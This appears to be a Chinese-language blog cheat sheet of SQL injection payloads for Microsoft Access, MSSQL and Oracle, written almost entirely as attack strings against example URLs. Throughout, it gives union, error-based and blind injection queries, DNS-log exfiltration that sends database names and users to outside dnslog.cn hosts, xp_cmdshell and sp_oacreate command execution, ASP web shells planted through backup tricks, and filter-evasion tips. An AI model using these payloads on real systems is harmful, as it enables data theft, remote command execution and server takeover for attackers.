Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名。
Access只有联合注入和布尔盲注。
1,联合注入
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 22
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
2,布尔盲注
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97
3,如何查询第二行的值
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where id=40
id=1513 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin where admin not in ('admin')
id=1513 union select 1,2,(select top 1 password from (select top 2 * from admin order by 1 desc)),4,5,6,7,8,9,10,11,12,13,14, (select top 1 admin from (select top 2 * from admin order by 1 desc)),16,17,18,19,20,21,22 from admin
4,access猜列名的一些特殊解法
利用having爆列
select id,admin,password from admin where id=1 group by 1 having 1=1
select id,admin,password from admin where id=1,id group by 1 having 1=1
select id,admin,password from admin where id=1 group by 1,id having 1=1
select id,admin,password from admin where id=1 group by 1,id,admin having 1=1
select * from admin where id=1 having sum(1)=1
偏移注入,需要猜到一个列名,一般是id
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10, * from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
id=1513 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)
移位溢注
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,admin.*,16,17,18,19,20,21,22 from admin
id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin
联合使用,必须总列数超过admin列数的1/4,上述条件不满足
select 1,2,3,4,5,6,a.*,* from (admin as a inner join admin as b on a.id=b.id)
5,一些tips
access空白符,%20,%09,%0A,%0C,%0D
没有注释,但是有注释符号,%16,%00
select(password)from(admin)
select[password]from[admin]
select`password`from`admin`
IIS特殊之处
允许出现%,比如uni%on select
允许Unicode编码,比如%u0075%u006eion select
这里和和json格式类似,{"id":"u0031"}
双参数则用逗号拼接,id=1&id=2则为id=1,2,联合注入时可以利用
而mysql可以这样id=1 and/*&id=*/1=1
直连导出,备份getshell
select * into [a] in 'E:1.asp;.xls' 'excel 4.0;' from admin
如果数据库文件(.mdb)可解析&#xff0c;在任意值插入【┼攠數畣整爠煥敵瑳∨≡┩愾】&#xff0c;可以解析成<%eval request ("a")%>
无select注入
id &#61; 39 and asc(mid(dfirst("password","admin"),1,1))&#61;97
select dfirst(1,"admin")
select dfirst("password","admin")
select dfirst("[password]","[admin]","id&#61;40")
select dlast("[password]","[admin]")
此外还有dlookup&#xff0c;dmin&#xff0c;dmax&#xff0c;dcount可用
其他davg&#xff0c;dsum&#xff0c;DStDev&#xff0c;DStDevP&#xff0c;DVar&#xff0c;DVarP只能数字类型
其他字符串比较
id &#61; 39 and instr(dfirst("[password]","[admin]","id&#61;40"),&#39;a&#39;)
id &#61; 39 and instr(dfirst("[password]","[admin]","id&#61;40"),&#39;a48e190fafc&#39;)
1&#xff0c;联合注入
http://127.0.0.1/1.aspx?id&#61;1 order by 4
http://127.0.0.1/1.aspx?id&#61;-1 union select 1,2,3,4
http://127.0.0.1/1.aspx?id&#61;-1 union all select null,null,null,null
http://127.0.0.1/1.aspx?id&#61;-1 union all select null,db_name(),null,null
查库&#xff0c;前六个都是系统库
(select name from master.dbo.sysdatabases where dbid&#61;7)
指定test库查第一个表
(select top 1 name from test.dbo.sysobjects where xtype&#61;&#39;U&#39;)
查当前库第一个表
(select top 1 name from sysobjects where xtype&#61;&#39;U&#39;)
查当前库第二个表
(select top 1 name from sysobjects where xtype&#61;&#39;U&#39; and name not in (&#39;admin&#39;))
查当前库所有表
(select name from sysobjects where xtype&#61;&#39;U&#39; FOR XML PATH(&#39;&#39;))
查列
(select top 1 name from syscolumns where id&#61;object_id(&#39;admin&#39;))
用|隔开查所有列
(select &#39;|&#39;%2bname%2b&#39;|&#39; from syscolumns where id&#61;object_id(&#39;admin&#39;) FOR XML PATH(&#39;&#39;))
快速变化0来查列
(select top 1 name from syscolumns where id&#61;object_id(&#39;admin&#39;) and name not in (select top 0 name from syscolumns where id&#61;object_id(&#39;admin&#39;)))
查所有值
(select password&#43;username from admin FOR XML PATH(&#39;&#39;))
mysql方式查表列
(select top 1 table_name from information_schema.tables)
(select top 1 column_name from information_schema.columns where table_name&#61;&#39;admin&#39;)
注:子查询如果无法使用&#xff0c;可能需要带入exists()函数
2&#xff0c;报错注入
mssql非常容易报错注入&#xff0c;只需要把字符串和数字比较即可
http://127.0.0.1/1.aspx?id&#61;&#64;&#64;version
http://127.0.0.1/1.aspx?id&#61;1 and &#64;&#64;version&#61;1
http://127.0.0.1/1.aspx?id&#61;1 and 1&#61;convert(int,&#64;&#64;version)
http://127.0.0.1/1.aspx?id&#61;1 and 1&#61;cast(&#64;&#64;version as int)
http://127.0.0.1/1.aspx?id&#61;1%2bUSER_NAME(&#64;&#64;version)
注: USER_NAME()可被SUSER_NAME() PERMISSIONS() DB_NAME()
以及FILE_NAME() TYPE_NAME() COL_NAME()代替
3&#xff0c;盲注
布尔盲注
http://127.0.0.1/1.aspx?id&#61;1 and ascii(substring((select user),1,1))&#61;100
时间盲注
select * from admin where id &#61; 1 if 1&#61;2 WAITFOR DELAY &#39;0:0:5&#39;
http://127.0.0.1/1.aspx?id&#61;1;if(ascii(substring((select user),1,1)))&#61;100 WAITFOR DELAY &#39;0:0:5&#39;
dnslog注入&#xff0c;必须堆叠&#xff0c;必须sa
原理是用xp_subdirs&#xff0c;xp_dirtree, xp_fileexist&#xff0c;读取smb共享域名。也有用OpenRowset()和OpenDatasource()的办法&#xff0c;这两个函数为远程加载其他mssql数据库&#xff0c;默认关闭。
declare &#64;host varchar(1024);
select &#64;host&#61;convert(varchar(1024),db_name())&#43;&#39;.vj0r9q.dnslog.cn&#39;;
exec(&#39;master..xp_subdirs "&#39;&#43;&#64;host&#43;&#39;"&#39;);
或者
exec(&#39;master..xp_dirtree "&#39;&#43;&#64;host&#43;&#39;"&#39;);
exec(&#39;master..xp_fileexist "&#39;&#43;&#64;host&#43;&#39;test"&#39;);
dnslog也有无需堆叠的方法
and exists(select * from fn_xe_file_target_read_file(&#39;C:Windowswin.ini&#39;,&#39;&#39;&#43;(select user)&#43;&#39;.a72ita.dnslog.cn1.xem&#39;,null,null))
and exists(select * from fn_get_audit_file(&#39;&#39;&#43;(select user)&#43;&#39;.a72ita.dnslog.cn1.xem&#39;,null,null))
and exists(select * from fn_trace_gettable(&#39;&#39;&#43;(select user)&#43;&#39;.xrjff0.dnslog.cn1.trc&#39;,null))
4&#xff0c;堆叠注入
mssql默认支持堆叠注入&#xff0c;所以一旦有注入相当于直连数据库&#xff0c;直接进行增删改查&#xff0c;如果有sa权限&#xff0c;还可以利用扩展进行进一步利用。
堆叠注入&#xff0c;可以用declare和exec进行无select注入
declare &#64;s varchar(2000) set &#64;s&#61;0x73656C6563742031 exec(&#64;s)
5&#xff0c;堆叠注入下的扩展运用
xp_cmdshell&#xff0c;命令执行&#xff0c;高版本默认关闭&#xff0c;但可以打开
Exec sp_configure &#39;show advanced options&#39;,1;RECONFIGURE;EXEC sp_configure &#39;xp_cmdshell&#39;,1;RECONFIGURE;
Exec master.dbo.xp_cmdshell &#39;whoami&#39;;
无需堆叠
id&#61;1 if 1&#61;1 execute(&#39;exec sp_configure &#39;&#39;show advanced options&#39;&#39;,1;reconfigure;exec sp_configure &#39;&#39;xp_cmdshell&#39;&#39;, 1;reconfigure;exec xp_cmdshell&#39;&#39;whoami&#39;&#39;&#39;);
openrowset 2005以后默认关闭
exec sp_configure &#39;show advanced options&#39;,1;reconfigure;exec sp_configure &#39;Ad Hoc Distributed Queries&#39;,1;reconfigure;
select * from openrowset(&#39;sqloledb&#39;,&#39;dsn&#61;locaserver;trusted_connection&#61;yes&#39;,&#39;set fmtonly off exec master..xp_cmdshell &#39;&#39;calc&#39;&#39;&#39;)
select x from OpenRowset(BULK &#39;C:Windowswin.ini&#39;,SINGLE_CLOB) R(x)
sp_OACreate和sp_oacreate&#xff0c;命令执行&#xff0c;文件操作&#xff0c;无回显
EXEC sp_configure &#39;show advanced options&#39;, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure &#39;Ole Automation Procedures&#39;, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure &#39;show advanced options&#39;, 0;
declare &#64;shell int exec sp_oacreate &#39;wscript.shell&#39;,&#64;shell output exec sp_oamethod &#64;shell,&#39;run&#39;,null,&#39;c:windowssystem32cmd.exe /c whoami >D:1.txt&#39;
DECLARE &#64;Result int;DECLARE &#64;FSO_Token int;EXEC &#64;Result &#61; sp_OACreate &#39;Scripting.FileSystemObject&#39;, &#64;FSO_Token OUTPUT;EXEC &#64;Result &#61; sp_OAMethod &#64;FSO_Token, &#39;DeleteFile&#39;, NULL, &#39;D:1.txt&#39;;EXEC &#64;Result &#61; sp_OADestroy &#64;FSO_Token;
declare &#64;aa int;exec sp_oacreate &#39;scripting.filesystemobject&#39;, &#64;aa out;exec sp_oamethod &#64;aa, &#39;moveFile&#39;,null,&#39;D:1.txt&#39;, &#39;D:2.txt&#39;;
declare &#64;aa int;exec sp_oacreate &#39;scripting.filesystemobject&#39;, &#64;aa out;exec sp_oamethod &#64;aa, &#39;moveFile&#39;,null,&#39;D:1.txt&#39;, &#39;D:2.txt&#39;;
declare &#64;o int;exec sp_oacreate &#39;scripting.filesystemobject&#39;, &#64;o out;exec sp_oamethod &#64;o, &#39;copyfile&#39;,null,&#39;D:1.txt&#39; ,&#39;D:2.txt&#39;;
declare &#64;o int;exec sp_oacreate &#39;Shell.Application&#39;, &#64;o out;exec sp_oamethod &#64;o, &#39;ShellExecute&#39;,null,&#39;C:windowssystem32calc.exe&#39;;
Agent Job执行命令
USE msdb;
EXEC dbo.sp_add_job &#64;job_name &#61; N&#39;test_powershell_job1&#39;;
EXEC sp_add_jobstep &#64;job_name &#61; N&#39;test_powershell_job1&#39;, &#64;step_name &#61; N&#39;test_powershell_name1&#39;, &#64;subsystem &#61; N&#39;PowerShell&#39;, &#64;command &#61; N&#39;c:windowssystem32cmd.exe /c whoami >c:1.txt&#39;, &#64;retry_attempts &#61; 1, &#64;retry_interval &#61; 5 ;
EXEC dbo.sp_add_jobserver &#64;job_name &#61; N&#39;test_powershell_job1&#39;;
EXEC dbo.sp_start_job N&#39;test_powershell_job1&#39;;
CLR程序集
MSSQL使用CLR程序集来执行命令 - 先知社区
沙盒执行命令&#xff08;可能仅限低版本&#xff09;
exec master..xp_regwrite &#39;HKEY_LOCAL_MACHINE&#39;,&#39;SOFTWAREMicrosoftJet4.0Engines&#39;,&#39;SandBoxMode&#39;,&#39;REG_DWORD&#39;,1
select * from openrowset(&#39;microsoft.jet.oledb.4.0&#39;,&#39;;database&#61;c:windowssystem32iasdnary.mdb&#39;,&#39;select shell("whoami")&#39;)
sp_makewebtask&#xff08;仅限低版本&#xff09;
exec sp_configure &#39;show advanced options&#39;, 1;RECONFIGURE;exec sp_configure &#39;Web Assistant Procedures&#39;,1;RECONFIGURE;
exec sp_makewebtask &#39;D:1.asp&#39;,&#39;select&#39;&#39;<%execute(request("a"))%>&#39;&#39; &#39;;
xp_dirtree和xp_subdirs&#xff0c;列文件&#xff0c;xp_fileexist确定文件是否存在
execute master..xp_dirtree &#39;c:&#39;,1,1
execute master..xp_subdirs &#39;c:&#39;
execute master..xp_fileexist &#39;D:test.txt&#39;
xp_regenumvalues&#xff0c;xp_regread&#xff0c;xp_regwrite&#xff0c;xp_regdeletevalue&#xff0c;xp_regdeletekey&#xff0c;注册表操作。
exec xp_regenumvalues&#39;HKEY_LOCAL_MACHINE&#39;,&#39;SOFTWAREMicrosoftWindowsCurrentVersionRun&#39;
EXEC master..xp_regenumvalues &#39;HKEY_CURRENT_USER&#39;,&#39;Control PanelInternational&#39;,&#39;sCountry&#39;;
sp_helpextendedproc&#xff0c;查看全部扩展
EXEC master..sp_helpextendedproc
xp_availablemedia&#xff0c;查看驱动器
exec master..xp_availablemedia
xp_logininfo&#xff0c;xp_enumgroups&#xff0c;查看计算机用户和组
exec xp_logininfo
sp_who2&#xff0c;查看登录账户
EXEC master..sp_who2
sp_addlinkedserver和sp_addlinkedsrvlogin
可登陆其他mssql和Oracle
6&#xff0c;文件读取和写入
BULK INSERT文件读取
create table #testtable(context ntext);BULK INSERT #testtable FROM &#39;D:/test.txt&#39; WITH (DATAFILETYPE &#61; &#39;char&#39;,KEEPNULLS);select * from #testtable;drop table #testtable;
数据库备份
create table [bin_cmd]([cmd] [image]);declare &#64;a sysname,&#64;s nvarchar(4000)select &#64;a&#61;db_name(),&#64;s&#61;0x62696E backup database &#64;a to disk&#61;&#64;s;insert into [bin_cmd](cmd)values(&#39;<%execute/**/(request(chr(35)))%>&#39;);declare &#64;b sysname,&#64;t nvarchar(4000)select &#64;b&#61;db_name(),&#64;t&#61;&#39;E:bin.asp&#39; backup database &#64;b to disk&#61;&#64;t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];
日志备份
create table [bin_cmd]([cmd] [image]);declare &#64;a sysname,&#64;s nvarchar(4000)select &#64;a&#61;db_name(),&#64;s&#61;0x62696E backup log &#64;a to disk&#61;&#64;s;insert into [bin_cmd](cmd)values(&#39;<%execute/**/(request(chr(35)))%>&#39;);declare &#64;b sysname,&#64;t nvarchar(4000)select &#64;b&#61;db_name(),&#64;t&#61;&#39;e:1.asp&#39; backup log &#64;b to disk&#61;&#64;t with init,no_truncate;drop table [bin_cmd];
7&#xff0c;一些tips
mssql自带函数
&#64;&#64;version system_user suser_sname() user db_name() host_name()
mssql空白符
%01-%20都为空白符&#xff0c;--和/**/为注释&#xff0c;%00也可充当注释符
其他方式
id&#61;0xunion selectNnull,null,null,null from.admin
避免使用引号
(select top 1 name from syscolumns where id&#61;object_id(&#39;admin&#39;))
(select top 1 name from syscolumns where id&#61;object_id(char(97)&#43;char(100)&#43;char(109)&#43;char(105)&#43;char(110)))
爆出当前完整语句
id&#61;1 union select null,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),null,null
1&#xff0c;联合注入
必须使用null&#xff0c;select必须带一个虚拟表 from dual
http://127.0.0.1:81/oracle.php?id&#61;1 order by 3
http://127.0.0.1:81/oracle.php?id&#61;-1 union select null,(select user from dual),null from dual
当前库名
select name from v$database
ip地址&#xff0c;ipv6
select utl_inaddr.get_host_address from dual
用户权限
select privilege from session_privs where rownum&#61;1
查库
select owner from all_tables where rownum&#61;1
查其他库
select owner from all_tables where rownum&#61;1 and owner <>&#39;SYS&#39;
查第一个表
select table_name from user_tables where rownum&#61;1
快速查询第二个表
select table_name from (select rownum r, table_name from user_tables order by table_name) WHERE r&#61;2
查询第一个列
select column_name from user_tab_columns where rownum&#61;1 and table_name&#61;&#39;admin&#39;
查询第一个值
select concat(username,password) from admin where rownum&#61;1
select username||password from admin where rownum&#61;1
2&#xff0c;报错注入
oracle报错注入也很简单&#xff0c;和1比较或者is not null即可
and 1&#61;utl_inaddr.get_host_name((select user from dual))
and 1&#61;ctxsys.drithsx.sn(1,(select user from dual))
and 1&#61;ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)
and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
and (select dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
3&#xff0c;盲注
布尔盲注&#xff0c;decode和if一样
and 6&#61;length(user)
and 83&#61;(select ascii(substr((select user from dual),1,1)) from dual)
and 1&#61;(select decode(substr((select user from dual),1,1),chr(83),1,0) from dual)
时间盲注
and 1&#61;(select decode(substr((select user from dual),1,1),chr(83),DBMS_PIPE.RECEIVE_MESSAGE(CHR(78),2),0) from dual)
and 1&#61;(select decode(substr((select user from dual),1,1),chr(83),(select count(*) from all_objects),0) from dual)
(select count(*) from all_objects)是类似笛卡尔积的高耗时操作&#xff0c;如果时间不明显&#xff0c;可以(select count(*) from all_objects)||(select count(*) from all_objects)加倍时间
dnslog盲注
and utl_http.request(&#39;http://&#39;||(select user from dual)||&#39;.0n7kdm.dnslog.cn/&#39;)&#61;1
and UTL_INADDR.GET_HOST_ADDRESS((select user from dual)||&#39;.7vkm67.dnslog.cn&#39;)&#61;1
4&#xff0c;oracle tips
Oracle空白符%00 %0A %0D %0C %09 %20
注释&#xff0c;同样支持/**/和--
避免使用引号
and user&#61;&#39;SYSTEM&#39;
and user&#61;chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)
上篇——珂字辈&#xff1a;sql注入第一章——mysql
觉得还不错的可以关注一下公众号——珂技知识分享&#xff0c;有些渗透实例会发布在上面。